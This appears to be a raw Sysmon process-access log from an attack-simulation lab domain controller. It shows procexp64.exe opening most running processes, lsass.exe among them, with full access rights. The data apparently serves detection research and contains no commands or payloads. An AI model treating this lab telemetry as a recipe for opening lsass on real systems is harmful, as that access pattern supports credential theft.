15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790176Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790175Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790174Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790173Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790172Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790171Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790170Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790169Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790168Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790167Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790166Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790165Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790164Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790163Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790162Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790161Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790160Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790159Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790158Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790157Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790392Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790391Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790390Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790389Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790388Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790387Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790386Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790385Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790384Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790383Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790382Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790381Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790380Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790379Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790378Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790377Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790376Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 